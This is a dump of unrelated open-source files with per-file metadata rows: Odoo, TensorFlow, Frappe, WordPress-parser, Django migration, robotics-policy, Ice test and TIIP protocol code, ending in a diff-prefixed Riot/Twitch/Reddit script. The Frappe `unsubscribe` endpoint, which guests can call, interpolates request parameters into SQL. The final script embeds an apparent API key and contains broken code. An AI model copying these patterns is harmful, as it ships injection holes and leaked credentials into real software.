nfe40_CRT = fields.Selection(related="tax_framework")
nfe40_enderEmit = fields.Many2one("res.partner", related="partner_id")
nfe40_choice6 = fields.Selection(string="CNPJ ou CPF?", compute="_compute_nfe_data")
processador_edoc = fields.Selection(
selection_add=PROCESSADOR,
)
nfe_version = fields.Selection(
selection=NFE_VERSIONS,
string="NFe Version",
default=NFE_VERSION_DEFAULT,
)
nfe_environment = fields.Selection(
selection=NFE_ENVIRONMENTS,
string="NFe Environment",
default=NFE_ENVIRONMENT_DEFAULT,
)
nfe_default_serie_id = fields.Many2one(
comodel_name="l10n_br_fiscal.document.serie",
string="NF-e Default Serie",
)
def _build_attr(self, node, fields, vals, path, attr):
if attr.get_name() == "enderEmit" and self.env.context.get("edoc_type") == "in":
# we don't want to try build a related partner_id for enderEmit
# when importing an NFe
# instead later the emit tag will be imported as the
# document partner_id (dest) and the enderEmit data will be
# injected in the same res.partner record.
return
return super()._build_attr(node, fields, vals, path, attr)
@api.model
def _prepare_import_dict(self, values, model=None):
# we disable enderEmit related creation with dry_run=True
context = self._context.copy()
context["dry_run"] = True
values = super(ResCompany, self.with_context(context))._prepare_import_dict(
values, model
)
if not values.get("name"):
values["name"] = values.get("nfe40_xNome") or values.get("nfe40_xFant")
return values
|
agpl-3.0
| -1,786,924,351,013,670,700
| 35.235294
| 88
| 0.63961
| false
| 3.198339
| false
| false
| false
|
google-research/language
|
language/boolq/utils/best_checkpoint_exporter.py
|
1
|
4132
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exporter to save the best checkpoint."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow.compat.v1 as tf
class BestCheckpointExporter(tf.estimator.Exporter):
"""Exporter that saves the model's best checkpoint.
We use this over `tf.estimator.BestExporter` since we don't want to
rely on tensorflow's `SavedModel` exporter method.
"""
def __init__(self, compare_fn, name='best-checkpoint',
event_file_pattern='eval/*.tfevents.*'):
"""Construct the exporter.
Args:
compare_fn: Function that, given the dictionary of output
metrics of the previously best and current checkpoints,
returns whether to override the previously best checkpoint
with the current one.
name: Name of the exporter
event_file_pattern: where to look for events logs
Raises:
ValueError: if given incorrect arguments
"""
self._name = name
self._compare_fn = compare_fn
if self._compare_fn is None:
raise ValueError('`compare_fn` must not be None.')
self._event_file_pattern = event_file_pattern
self._model_dir = None
self._best_eval_result = None
@property
def name(self):
return self._name
def export(self, estimator, export_path, checkpoint_path,
eval_result, is_the_final_export):
del is_the_final_export
if self._model_dir != estimator.model_dir and self._event_file_pattern:
tf.logging.info('Loading best metric from event files.')
self._model_dir = estimator.model_dir
full_event_file_pattern = os.path.join(self._model_dir,
self._event_file_pattern)
self._best_eval_result = self._get_best_eval_result(
full_event_file_pattern)
if self._best_eval_result is None or self._compare_fn(
best_eval_result=self._best_eval_result,
current_eval_result=eval_result):
tf.logging.info('Performing best checkpoint export.')
self._best_eval_result = eval_result
if not tf.gfile.Exists(export_path):
tf.gfile.MakeDirs(export_path)
new_files = set()
for file_path in tf.gfile.Glob(checkpoint_path + '.*'):
basename = os.path.basename(file_path)
new_files.add(basename)
out_file = os.path.join(export_path, basename)
tf.gfile.Copy(file_path, out_file)
# Clean out any old files
for filename in tf.gfile.ListDirectory(export_path):
if filename not in new_files:
tf.gfile.Remove(os.path.join(export_path, filename))
def _get_best_eval_result(self, event_files):
"""Get the best eval result from event files.
Args:
event_files: Absolute pattern of event files.
Returns:
The best eval result.
"""
if not event_files:
return None
best_eval_result = None
for event_file in tf.gfile.Glob(os.path.join(event_files)):
for event in tf.train.summary_iterator(event_file):
if event.HasField('summary'):
event_eval_result = {}
for value in event.summary.value:
if value.HasField('simple_value'):
event_eval_result[value.tag] = value.simple_value
if event_eval_result:
if best_eval_result is None or self._compare_fn(
best_eval_result, event_eval_result):
best_eval_result = event_eval_result
return best_eval_result
|
apache-2.0
| -1,810,089,931,885,031,700
| 34.316239
| 76
| 0.659003
| false
| 3.957854
| false
| false
| false
|
cadencewatches/frappe
|
frappe/utils/email_lib/bulk.py
|
1
|
4862
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
import HTMLParser
import urllib
from frappe import msgprint, throw, _
from frappe.utils.email_lib.smtp import SMTPServer
from frappe.utils.email_lib.email_body import get_email, get_formatted_html
from frappe.utils.email_lib.html2text import html2text
from frappe.utils import cint, get_url, nowdate
class BulkLimitCrossedError(frappe.ValidationError): pass
def send(recipients=None, sender=None, doctype='User', email_field='email',
subject='[No Subject]', message='[No Content]', ref_doctype=None, ref_docname=None,
add_unsubscribe_link=True):
def is_unsubscribed(rdata):
if not rdata:
return 1
return cint(rdata.unsubscribed)
def check_bulk_limit(new_mails):
this_month = frappe.db.sql("""select count(*) from `tabBulk Email` where
month(creation)=month(%s)""" % nowdate())[0][0]
monthly_bulk_mail_limit = frappe.conf.get('monthly_bulk_mail_limit') or 500
if this_month + len(recipients) > monthly_bulk_mail_limit:
throw(_("Bulk email limit {0} crossed").format(monthly_bulk_mail_limit),
BulkLimitCrossedError)
def update_message(formatted, doc, add_unsubscribe_link):
updated = formatted
if add_unsubscribe_link:
unsubscribe_link = """<div style="padding: 7px; border-top: 1px solid #aaa;
margin-top: 17px;">
<small><a href="%s/?%s">
Unsubscribe</a> from this list.</small></div>""" % (get_url(),
urllib.urlencode({
"cmd": "frappe.utils.email_lib.bulk.unsubscribe",
"email": doc.get(email_field),
"type": doctype,
"email_field": email_field
}))
updated = updated.replace("<!--unsubscribe link here-->", unsubscribe_link)
return updated
if not recipients: recipients = []
if not sender or sender == "Administrator":
sender = frappe.db.get_value('Outgoing Email Settings', None, 'auto_email_id')
check_bulk_limit(len(recipients))
formatted = get_formatted_html(subject, message)
for r in filter(None, list(set(recipients))):
rdata = frappe.db.sql("""select * from `tab%s` where %s=%s""" % (doctype,
email_field, '%s'), (r,), as_dict=1)
doc = rdata and rdata[0] or {}
if (not add_unsubscribe_link) or (not is_unsubscribed(doc)):
# add to queue
updated = update_message(formatted, doc, add_unsubscribe_link)
try:
text_content = html2text(updated)
except HTMLParser.HTMLParseError:
text_content = "[See html attachment]"
add(r, sender, subject, updated, text_content, ref_doctype, ref_docname)
def add(email, sender, subject, formatted, text_content=None,
ref_doctype=None, ref_docname=None):
"""add to bulk mail queue"""
e = frappe.new_doc('Bulk Email')
e.sender = sender
e.recipient = email
try:
e.message = get_email(email, sender=e.sender, formatted=formatted, subject=subject,
text_content=text_content).as_string()
except frappe.ValidationError:
# bad email id - don't add to queue
return
e.status = 'Not Sent'
e.ref_doctype = ref_doctype
e.ref_docname = ref_docname
e.save(ignore_permissions=True)
@frappe.whitelist(allow_guest=True)
def unsubscribe():
doctype = frappe.form_dict.get('type')
field = frappe.form_dict.get('email_field')
email = frappe.form_dict.get('email')
frappe.db.sql("""update `tab%s` set unsubscribed=1
where `%s`=%s""" % (doctype, field, '%s'), (email,))
if not frappe.form_dict.get("from_test"):
frappe.db.commit()
frappe.local.message_title = "Unsubscribe"
frappe.local.message = "<h3>Unsubscribed</h3><p>%s has been successfully unsubscribed.</p>" % email
frappe.response['type'] = 'page'
frappe.response['page_name'] = 'message.html'
def flush(from_test=False):
"""flush email queue, every time: called from scheduler"""
smtpserver = SMTPServer()
auto_commit = not from_test
if frappe.flags.mute_emails or frappe.conf.get("mute_emails") or False:
msgprint(_("Emails are muted"))
from_test = True
for i in xrange(500):
email = frappe.db.sql("""select * from `tabBulk Email` where
status='Not Sent' limit 1 for update""", as_dict=1)
if email:
email = email[0]
else:
break
frappe.db.sql("""update `tabBulk Email` set status='Sending' where name=%s""",
(email["name"],), auto_commit=auto_commit)
try:
if not from_test:
smtpserver.sess.sendmail(email["sender"], email["recipient"], email["message"])
frappe.db.sql("""update `tabBulk Email` set status='Sent' where name=%s""",
(email["name"],), auto_commit=auto_commit)
except Exception, e:
frappe.db.sql("""update `tabBulk Email` set status='Error', error=%s
where name=%s""", (unicode(e), email["name"]), auto_commit=auto_commit)
def clear_outbox():
"""remove mails older than 30 days in Outbox"""
frappe.db.sql("""delete from `tabBulk Email` where
datediff(now(), creation) > 30""")
|
mit
| -8,974,642,157,343,609,000
| 32.531034
| 100
| 0.693542
| false
| 3.159194
| false
| false
| false
|
hzmangel/wp2hugo
|
wp_parser.py
|
1
|
3688
|
from lxml import etree
class WordpressXMLParser:
def __init__(self, xml_file):
self.tree = etree.parse(xml_file)
self.ns = self.tree.getroot().nsmap
def get_meta(self):
return {
"title": str(self.tree.xpath("/rss/channel/title/text()")[0]),
"baseurl": str(self.tree.xpath("/rss/channel/link/text()")[0]),
"description": str(self.tree.xpath("/rss/channel/description/text()")[0]),
"language": str(self.tree.xpath("/rss/channel/language/text()")[0]),
"author": {
"name": str(self.tree.xpath("/rss/channel/wp:author/wp:author_display_name/text()", namespaces=self.ns)[0]),
"email": str(self.tree.xpath("/rss/channel/wp:author/wp:author_email/text()", namespaces=self.ns)[0]),
}
}
def get_categories(self):
categories = self.tree.xpath('/rss/channel/wp:category', namespaces=self.ns)
rslt = []
for r in categories:
rslt.append({
"term_id": str(r.xpath("wp:term_id/text()", namespaces=self.ns)[0]),
"nicename": str(r.xpath("wp:category_nicename/text()", namespaces=self.ns)[0]),
"name": str(r.xpath("wp:cat_name/text()", namespaces=self.ns)[0]),
})
return rslt
def get_tags(self):
tags = self.tree.xpath('/rss/channel/wp:tag', namespaces=self.ns)
rslt = []
for r in tags:
rslt.append({
"term_id": str(r.xpath("wp:term_id/text()", namespaces=self.ns)[0]),
"nicename": str(r.xpath("wp:tag_slug/text()", namespaces=self.ns)[0]),
"name": str(r.xpath("wp:tag_name/text()", namespaces=self.ns)[0]),
})
return rslt
def get_public_posts(self):
posts = self.tree.xpath("/rss/channel/item[wp:post_type='post' and wp:status!='draft']", namespaces=self.ns)
rslt = []
for r in posts:
rslt.append({
"title": str(r.xpath("title/text()")[0]),
"link": str(r.xpath("link/text()")[0]),
"creator": str(r.xpath("dc:creator/text()", namespaces=self.ns)[0]),
"content": str(r.xpath("content:encoded/text()", namespaces=self.ns)[0]),
"post_date": str(r.xpath("wp:post_date/text()", namespaces=self.ns)[0]),
"post_name": str(r.xpath("wp:post_name/text()", namespaces=self.ns)[0]),
"post_status": str(r.xpath("wp:status/text()", namespaces=self.ns)[0]),
"categories": [str(foo) for foo in r.xpath("category[@domain='category']/text()")],
"tags": [str(foo) for foo in r.xpath("category[@domain='post_tag']/text()")],
})
return rslt
def get_drafts(self):
drafts = self.tree.xpath("/rss/channel/item[wp:post_type='post' and wp:status='draft']", namespaces=self.ns)
rslt = []
for r in drafts:
rslt.append({
"title": str(r.xpath("title/text()")[0]),
"link": str(r.xpath("link/text()")[0]),
"creator": str(r.xpath("dc:creator/text()", namespaces=self.ns)[0]),
"content": str(r.xpath("content:encoded/text()", namespaces=self.ns)[0]),
"post_date": str(r.xpath("wp:post_date/text()", namespaces=self.ns)[0]),
"post_status": str(r.xpath("wp:status/text()", namespaces=self.ns)[0]),
"categories": [str(foo) for foo in r.xpath("category[@domain='category']/text()")],
"tags": [str(foo) for foo in r.xpath("category[@domain='post_tag']/text()")],
})
return rslt
|
mit
| 743,162,522,983,472,900
| 42.904762
| 124
| 0.532538
| false
| 3.472693
| false
| false
| false
|
jfunez/poliwall
|
poliwall/apps/polisessions/migrations/0002_auto__add_actioncategory__add_field_action_category.py
|
1
|
5819
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ActionCategory'
db.create_table(u'polisessions_actioncategory', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
))
db.send_create_signal(u'polisessions', ['ActionCategory'])
# Adding field 'Action.category'
db.add_column(u'polisessions_action', 'category',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['polisessions.ActionCategory'], null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting model 'ActionCategory'
db.delete_table(u'polisessions_actioncategory')
# Deleting field 'Action.category'
db.delete_column(u'polisessions_action', 'category_id')
models = {
u'polidata.house': {
'Meta': {'object_name': 'House'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'rol_name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'polidata.legislative': {
'Meta': {'object_name': 'Legislative'},
'code': ('django.db.models.fields.IntegerField', [], {}),
'end_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'roman_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
u'polidata.politician': {
'Meta': {'object_name': 'Politician'},
'biography': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'politician_id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'profile_id': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'profile_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'sex': ('django.db.models.fields.CharField', [], {'default': "'M'", 'max_length': '1', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'twitter_user': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'polisessions.action': {
'Meta': {'ordering': "['session']", 'object_name': 'Action'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['polisessions.ActionCategory']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislative': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'legislative_actions'", 'to': u"orm['polidata.Legislative']"}),
'politician': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actions'", 'to': u"orm['polidata.Politician']"}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['polisessions.Session']"}),
'source_url': ('django.db.models.fields.TextField', [], {}),
'text': ('django.db.models.fields.TextField', [], {})
},
u'polisessions.actioncategory': {
'Meta': {'object_name': 'ActionCategory'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'polisessions.session': {
'Meta': {'ordering': "['date', 'ordinal']", 'object_name': 'Session'},
'assists_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'house': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'session_houses'", 'to': u"orm['polidata.House']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislative': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'session_legislatives'", 'to': u"orm['polidata.Legislative']"}),
'number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'ordinal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'president': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'presidents'", 'null': 'True', 'to': u"orm['polidata.Politician']"}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'source_url': ('django.db.models.fields.TextField', [], {})
}
}
complete_apps = ['polisessions']
|
agpl-3.0
| 238,009,160,051,770,620
| 62.26087
| 180
| 0.558687
| false
| 3.56338
| false
| false
| false
|
rlworkgroup/metaworld
|
metaworld/policies/sawyer_sweep_into_v2_policy.py
|
1
|
1506
|
import numpy as np
from metaworld.policies.action import Action
from metaworld.policies.policy import Policy, assert_fully_parsed, move
class SawyerSweepIntoV2Policy(Policy):
@staticmethod
@assert_fully_parsed
def _parse_obs(obs):
return {
'hand_pos': obs[:3],
'unused_1': obs[3],
'cube_pos': obs[4:7],
'unused_2': obs[7:-3],
'goal_pos': obs[-3:],
}
def get_action(self, obs):
o_d = self._parse_obs(obs)
action = Action({
'delta_pos': np.arange(3),
'grab_effort': 3
})
action['delta_pos'] = move(o_d['hand_pos'], to_xyz=self._desired_pos(o_d), p=25.)
action['grab_effort'] = self._grab_effort(o_d)
return action.array
@staticmethod
def _desired_pos(o_d):
pos_curr = o_d['hand_pos']
pos_cube = o_d['cube_pos'] + np.array([-0.005, .0, .01])
pos_goal = o_d['goal_pos']
if np.linalg.norm(pos_curr[:2] - pos_cube[:2]) > 0.04:
return pos_cube + np.array([0., 0., 0.3])
elif abs(pos_curr[2] - pos_cube[2]) > 0.04:
return pos_cube
else:
return pos_goal
@staticmethod
def _grab_effort(o_d):
pos_curr = o_d['hand_pos']
pos_cube = o_d['cube_pos']
if np.linalg.norm(pos_curr[:2] - pos_cube[:2]) > 0.04 \
or abs(pos_curr[2] - pos_cube[2]) > 0.15:
return -1.
else:
return .7
|
mit
| 1,833,870,968,265,588,700
| 26.381818
| 89
| 0.508632
| false
| 3.118012
| false
| false
| false
|
grembo/ice
|
python/test/Ice/ami/TestI.py
|
1
|
3180
|
# **********************************************************************
#
# Copyright (c) 2003-2017 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
import Ice, Test, threading, time
class TestIntfI(Test.TestIntf):
def __init__(self):
self._cond = threading.Condition()
self._batchCount = 0
self._pending = None
self._shutdown = False
def op(self, current=None):
pass
def opWithResult(self, current=None):
return 15
def opWithUE(self, current=None):
raise Test.TestIntfException()
def opWithPayload(self, bytes, current=None):
pass
def opBatch(self, current=None):
with self._cond:
self._batchCount += 1
self._cond.notify()
def opBatchCount(self, current=None):
with self._cond:
return self._batchCount
def waitForBatch(self, count, current=None):
with self._cond:
while self._batchCount < count:
self._cond.wait(5)
result = count == self._batchCount
self._batchCount = 0
return result
def close(self, mode, current=None):
current.con.close(Ice.ConnectionClose.valueOf(mode.value))
def sleep(self, ms, current=None):
time.sleep(ms / 1000.0)
def startDispatch(self, current=None):
with self._cond:
if self._shutdown:
# Ignore, this can occur with the forcefull connection close test, shutdown can be dispatch
# before start dispatch.
v = Ice.Future()
v.set_result(None)
return v
elif self._pending:
self._pending.set_result(None)
self._pending = Ice.Future()
return self._pending
def finishDispatch(self, current=None):
with self._cond:
if self._shutdown:
return
elif self._pending: # Pending might not be set yet if startDispatch is dispatch out-of-order
self._pending.set_result(None)
self._pending = None
def shutdown(self, current=None):
with self._cond:
self._shutdown = True
if self._pending:
self._pending.set_result(None)
self._pending = None
current.adapter.getCommunicator().shutdown()
def supportsAMD(self, current=None):
return True
def supportsFunctionalTests(self, current=None):
return False
def pingBiDir(self, id, current = None):
Test.PingReplyPrx.uncheckedCast(current.con.createProxy(id)).reply()
class TestIntfII(Test.Outer.Inner.TestIntf):
def op(self, i, current):
return (i, i)
class TestIntfControllerI(Test.TestIntfController):
def __init__(self, adapter):
self._adapter = adapter
def holdAdapter(self, current=None):
self._adapter.hold()
def resumeAdapter(self, current=None):
self._adapter.activate()
|
gpl-2.0
| -1,354,653,715,512,082,000
| 29.576923
| 107
| 0.566038
| false
| 4.274194
| true
| false
| false
|
whitelizard/pytiip
|
pytiip/tiip.py
|
1
|
13043
|
"""
Python implementation of the TIIP (Thin Industrial Internet Protocol) protocol.
"""
import json
from datetime import datetime as dt
from datetime import timedelta as td
import dateutil.parser as parser
# Python3 compability fixes
import sys
PY3 = sys.version_info > (3,)
if PY3:
long = int
unicode = str
else:
# noinspection PyShadowingBuiltins
bytes = str
__version__ = 'tiip.3.0' # TIIP protocol version
class TIIPMessage(object):
# noinspection PyShadowingBuiltins
def __init__(
self, tiipStr=None, tiipDict=None, ts=None, lat=None, mid=None, sid=None, type=None,
src=None, targ=None, sig=None, ch=None, arg=None, pl=None, ok=None,
ten=None, verifyVersion=True):
"""
@param tiipStr: A string representation of a TIIPMessage to load on init
@param tiipDict: A dictionary representation of a TIIPMessage to load on init
@raise: TypeError, ValueError
All other arguments are keys to set in the TIIPMessage, see TIIP specification for more details:
https://github.com/whitelizard/tiip
"""
# Protocol keys
self.__pv = __version__
self.__ts = self.getTimeStamp()
self.__lat = None
self.__mid = None
self.__sid = None
self.__type = None
self.__src = None
self.__targ = None
self.__sig = None
self.__ch = None
self.__arg = None
self.__pl = None
self.__ok = None
self.__ten = None
# Parse constructor arguments
if tiipStr is not None:
self.loadFromStr(tiipStr, verifyVersion)
if tiipDict is not None:
self.loadFromDict(tiipDict, verifyVersion)
if ts is not None:
self.ts = ts
if lat is not None:
self.lat = lat
if mid is not None:
self.mid = mid
if sid is not None:
self.sid = sid
if type is not None:
self.type = type
if src is not None:
self.src = src
if targ is not None:
self.targ = targ
if sig is not None:
self.sig = sig
if ch is not None:
self.ch = ch
if arg is not None:
self.arg = arg
if pl is not None:
self.pl = pl
if ok is not None:
self.ok = ok
if ten is not None:
self.ten = ten
def __str__(self):
return json.dumps(dict(self))
def __iter__(self):
yield 'pv', self.__pv
yield 'ts', self.__ts
if self.__lat is not None:
yield 'lat', self.__lat
if self.__mid is not None:
yield 'mid', self.__mid
if self.__sid is not None:
yield 'sid', self.__sid
if self.__type is not None:
yield 'type', self.__type
if self.__src is not None:
yield 'src', self.__src
if self.__targ is not None:
yield 'targ', self.__targ
if self.__sig is not None:
yield 'sig', self.__sig
if self.__ch is not None:
yield 'ch', self.__ch
if self.__arg is not None:
yield 'arg', self.__arg
if self.__pl is not None:
yield 'pl', self.__pl
if self.__ok is not None:
yield 'ok', self.__ok
if self.__ten is not None:
yield 'ten', self.__ten
@staticmethod
def getTimeStamp():
"""
Creates a timestamp string representation according to the TIIP-specification for timestamps.
@return:
"""
return dt.utcnow().isoformat(timespec='microseconds') + 'Z'
@property
def pv(self):
return self.__pv
@property
def ts(self):
return self.__ts
@ts.setter
def ts(self, value):
if isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
try:
dateObj = parser.parse(value)
except ValueError:
raise ValueError('timestamp string must be parseable to datetime')
if dateObj.utcoffset() not in [None, td(0)]:
raise ValueError('timestamp string must be in utc timezone')
if value[-1] != 'Z' or value[19] != '.':
raise ValueError('seconds must be decimals and end with Z')
self.__ts = value
elif isinstance(value, dt):
if value.utcoffset() not in [None, td(0)]:
raise ValueError('timestamp string must be in utc timezone')
iso = value.isoformat(timespec='microseconds')
if iso.endswith("+00:00"):
iso = iso[:-6]
self.__ts = iso + 'Z'
else:
raise TypeError('timestamp can only be of types datetime or a valid unicode or string representation of a iso 6801')
@property
def lat(self):
return self.__lat
@lat.setter
def lat(self, value):
if value is None:
self.__lat = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
try:
float(value) # Check if string is float representation
except ValueError:
raise ValueError('Latency string must be parseable to float')
else:
self.__lat = value
elif isinstance(value, (int, float, long)):
self.__lat = repr(round(value, 6))
else:
raise TypeError('Latency can only be of types None, float, int, long or a valid unicode or string representation of a float')
@property
def mid(self):
return self.__mid
@mid.setter
def mid(self, value):
if value is None:
self.__mid = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__mid = value
else:
raise TypeError('mid can only be of types unicode, str or None')
@property
def sid(self):
return self.__sid
@sid.setter
def sid(self, value):
if value is None:
self.__sid = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__sid = value
else:
raise TypeError('sid can only be of types unicode, str or None')
@property
def type(self):
return self.__type
@type.setter
def type(self, value):
if value is None:
self.__type = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__type = value
else:
raise TypeError('type can only be of types unicode, str or None')
@property
def src(self):
return self.__src
@src.setter
def src(self, value):
if value is None:
self.__src = None
elif isinstance(value, list):
self.__src = value
else:
raise TypeError('source can only be of types list or None')
@property
def targ(self):
return self.__targ
@targ.setter
def targ(self, value):
if value is None:
self.__targ = None
elif isinstance(value, list):
self.__targ = value
else:
raise TypeError('target can only be of types list or None')
@property
def sig(self):
return self.__sig
@sig.setter
def sig(self, value):
if value is None:
self.__sig = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__sig = value
else:
raise TypeError('signal can only be of types unicode, str or None')
@property
def ch(self):
return self.__ch
@ch.setter
def ch(self, value):
if value is None:
self.__ch = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__ch = value
else:
raise TypeError('channel can only be of types unicode, str or None')
@property
def arg(self):
return self.__arg
@arg.setter
def arg(self, value):
if value is None:
self.__arg = None
elif isinstance(value, dict):
self.__arg = value
else:
raise TypeError('arguments can only be of types dict or None')
@property
def pl(self):
return self.__pl
@pl.setter
def pl(self, value):
if value is None:
self.__pl = None
elif isinstance(value, list):
self.__pl = value
else:
raise TypeError('payload can only be of types list or None')
@property
def ok(self):
return self.__ok
@ok.setter
def ok(self, value):
if value is None:
self.__ok = None
elif isinstance(value, bool):
self.__ok = value
else:
raise TypeError('ok can only be of types bool or None')
@property
def ten(self):
return self.__ten
@ten.setter
def ten(self, value):
if value is None:
self.__ten = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__ten = value
else:
raise TypeError('tenant can only be of types unicode, str or None')
def loadFromStr(self, tiipStr, verifyVersion=True):
"""
Loads this object with values from a string or unicode representation of a TIIPMessage.
@param tiipStr: The string to load properties from.
@param verifyVersion: True to verify that tiipDict has the right protocol
@raise: TypeError, ValueError
@return: None
"""
tiipDict = json.loads(tiipStr)
self.loadFromDict(tiipDict, verifyVersion)
def loadFromDict(self, tiipDict, verifyVersion=True):
"""
Loads this object with values from a dictionary representation of a TIIPMessage.
@param tiipDict: The dictionary to load properties from.
@param verifyVersion: True to verify that tiipDict has the right protocol
@raise: TypeError, ValueError
@return: None
"""
if verifyVersion:
if 'pv' not in tiipDict or tiipDict['pv'] != self.__pv:
raise ValueError('Incorrect tiip version "' + str(tiipDict['pv']) + '" expected "' + self.__pv + '"')
if 'pv' not in tiipDict or tiipDict['pv'] != self.__pv:
if tiipDict['pv'] == "tiip.2.0":
if 'ct' in tiipDict:
ct = float(tiipDict['ct'])
ts = float(tiipDict['ts'])
tiipDict['ts'] = str(ct)
tiipDict['lat'] = str(ts - ct)
tiipDict['ts'] = dt.utcfromtimestamp(float(tiipDict['ts'])).isoformat(timespec='microseconds') + 'Z'
if 'ts' in tiipDict:
self.ts = tiipDict['ts']
if 'lat' in tiipDict:
self.lat = tiipDict['lat']
if 'mid' in tiipDict:
self.mid = tiipDict['mid']
if 'sid' in tiipDict:
self.sid = tiipDict['sid']
if 'type' in tiipDict:
self.type = tiipDict['type']
if 'src' in tiipDict:
self.src = tiipDict['src']
if 'targ' in tiipDict:
self.targ = tiipDict['targ']
if 'sig' in tiipDict:
self.sig = tiipDict['sig']
if 'ch' in tiipDict:
self.ch = tiipDict['ch']
if 'arg' in tiipDict:
self.arg = tiipDict['arg']
if 'pl' in tiipDict:
self.pl = tiipDict['pl']
if 'ok' in tiipDict:
self.ok = tiipDict['ok']
if 'ten' in tiipDict:
self.ten = tiipDict['ten']
def asVersion(self, version):
if version == self.__pv:
return str(self)
elif version == "tiip.2.0":
tiipDict = {}
for key, val in self:
tiipDict[key] = val
if "lat" in tiipDict:
ct = parser.parse(tiipDict["ts"]).timestamp()
tiipDict["ct"] = str(ct)
tiipDict["ts"] = str(ct + float(tiipDict["lat"]))
tiipDict.pop("lat")
else:
tiipDict["ts"] = str(parser.parse(tiipDict["ts"]).timestamp())
tiipDict["pv"] = version
return json.dumps(tiipDict)
else:
raise ValueError('Incorrect tiip version. Can only handle versions: tiip.2.0 and tiip.3.0')
|
mit
| 1,881,399,946,409,692,700
| 30.936869
| 137
| 0.527026
| false
| 4.261026
| false
| false
| false
|
Cloud-Rush/LOL
|
cacheManager.py
|
1
|
6523
|
-import json
-import time
-import praw
-from riotwatcher import Riotwatcher
-from riotwatcher import EUROPE_WEST
-from riotwatcher import EUROPE_NORDIC_EAST
-from riotwatcher import KOREA
-from riotwatcher import OCEANIA
-from riotwatcher import BRAZIL
-from riotwatcher import LATIN_AMERICA_SOUTH
-from riotwatcher import LATIN_AMERICA_NORTH
-from riotwatcher import NORTH_AMERICA
-from riotwatcher import RUSSIA
-from riotwatcher import TURKEY
-from twitch import *
-
-
-riot = RiotWatcher('24d89b10-e6ee-469a-91bd-f5e2d15c9e31')
-twitch = TwitchTV()
-reddit = praw.Reddit(user_agent = 'TheFountain by /u/tstarrs')
-submissions = reddit.get_subreddit('leagueoflegends').get_top(limit = 10)
-submissions2 = reddit.get_subreddit('summonerschool').get_top(limit = 10)
-submissions3 = reddit.get_subreddit('loleventvods').get_top(limit = 10)
-allSubmissions = (submissions + submissions2 + submissions3)
-
-cacheFile = open("cacheDatabase.json")
-cacheData = json.load(cacheFile)
-cacheFile.close()
-
-CHAMPION_TOLERANCE = 180000 #3min
